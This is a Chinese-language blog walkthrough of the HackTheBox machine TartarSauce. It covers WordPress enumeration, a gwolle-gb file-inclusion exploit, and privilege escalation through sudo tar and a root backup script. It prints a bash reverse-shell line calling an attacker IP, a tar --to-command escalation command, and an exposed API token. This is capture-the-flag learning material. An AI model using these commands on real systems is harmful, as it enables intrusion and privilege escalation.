No.131-HackTheBox-Linux-TartarSauce-Walkthrough滲透學習

**

HackTheBox-Linux-TartarSauce-Walkthrough

**

靶機地址：https://www.hackthebox.eu/home/machines/profile/138
靶機難度：中級（4.7/10）
靶機發布日期：2018年10月28日
靶機描述：
TartarSauce is a fairly challenging box that highlights the importance of a broad remote enumeration instead of focusing on obvious but potentially less fruitful attack vectors. It features a quite realistic privilege escalation requiring abuses of the tar command. Attention to detail when reviewing tool output is beneficial when attempting this machine.

作者：大餘
時間：2020-06-10

請注意：對於所有這些計算機，我是通過平臺授權允許情況進行滲透的。我將使用Kali Linux作爲解決該HTB的攻擊者機器。這裏使用的技術僅用於學習教育目的，如果列出的技術用於其他任何目標，我概不負責。

一、信息收集

可以看到靶機的IP是10.10.10.88…

nmap掃描發現80端口上Apache存在幾個子目錄…

訪問apache一瓶汽水…

經過直接對nmap發現的目錄進行各種枚舉…發現了/wp子目錄…

訪問後發現這是wordpress框架頁面…404報錯…遭到了破壞?上篇文章也遇到了，直接添加域名到hosts即可正常顯示…

命令：wpscan --url http://10.10.10.88/webservices/wp --enumerate p --api-token kJ4bhZCgveCcoGJPER7AOsHJTeFDf90Wfj9zu0V6asc
wordpress直接利用wpscan進行滲透…可以看到開始是沒有API…前往wpscan官網免費註冊一天可以掃50次，獲得API直接利用在繼續…

發現gwolle-gb中存在遠程文件包含漏洞…

查看EXP…下載下來…

閱讀後利用EXP方法即可文件上傳提權…

簡單shell通過EXP上傳訪問，即可獲得反向外殼…成功獲得了www低權用戶…
這裏利用了gwolle漏洞提權…

命令：

echo -e '#!/bin/bash\n\nbash -i >& /dev/tcp/10.10.14.51/7777 0>&1' > dayu.sh
tar -cvf dayu.tar dayu.sh

權限很低，無法進入用戶目錄…
枚舉發現sudo -l中以tar用戶身份運行onuma可以提升到用戶權限…

命令：sudo -u onuma tar -xvf dayu.tar --to-command /bin/bash
成功提升權限，獲得了user_flag信息…

這裏通過LinEnum枚舉目前未發現可利用地方…
上傳pspy監控進程看看…

發現每五分鐘/usr/sbin/backuperer會自動以root權限執行…

查看backuperer內容得出：
1、會從/var/tmp和/var/tmp/check文件夾中刪除帶點文件？
2、會將/var/www/html用戶onuma的內容壓縮/存檔到文件/var/tmp中，文件的名稱以點名開頭？
3、帶點文件存在30秒。
4、會創建/var/tmp/check目錄。
5、將先前解壓的內容作爲根提取到/var/tmp/check目錄中。
6、diff對/var/www/htmlvs 進行對抗/var/tmp/check/var/www/html
目錄中的文件會以root權限執行…
那這樣可以抓住30秒時間，每到五分鐘歸零新一輪開始時開始計算30秒時間，當歸零時會生成一個帶點文件，30秒後會自動刪除，期間如果是tar，會自動解壓到check目錄下…
只需要利用30秒時間插入個簡單shell複製到帶點文件，帶點文件30秒後會自動解壓shell到check目錄下，就可以以root權限執行了，獲得反彈外殼…開始

首先在本地按照backuperer腳本提示，還原方法創建了shell.tar文本…
將其上傳到靶機/var/tmp目錄下…

利用systemctl list-timers查看backuperer進程的運行時間…
等待LEFT倒計時歸零時，ls -la在tmp目錄下查看到帶點的文件，cp剛上傳的shell.tar到帶點文件即可…

過10秒左右，腳本會自動解壓到check目錄，如果未生成check說明失敗…檢查前面操作…
在check下，查看到了shell具有root執行權限…

執行後獲得了root權限，查看到了root_flag信息…

這臺就不總結了，思路很好…加油

由於我們已經成功得到root權限查看user和root.txt，因此完成這臺中級的靶機，希望你們喜歡這臺機器，請繼續關注大餘後期會有更多具有挑戰性的機器，一起練習學習。

如果你有其他的方法，歡迎留言。要是有寫錯了的地方，請你一定要告訴我。要是你覺得這篇博客寫的還不錯，歡迎分享給身邊的人。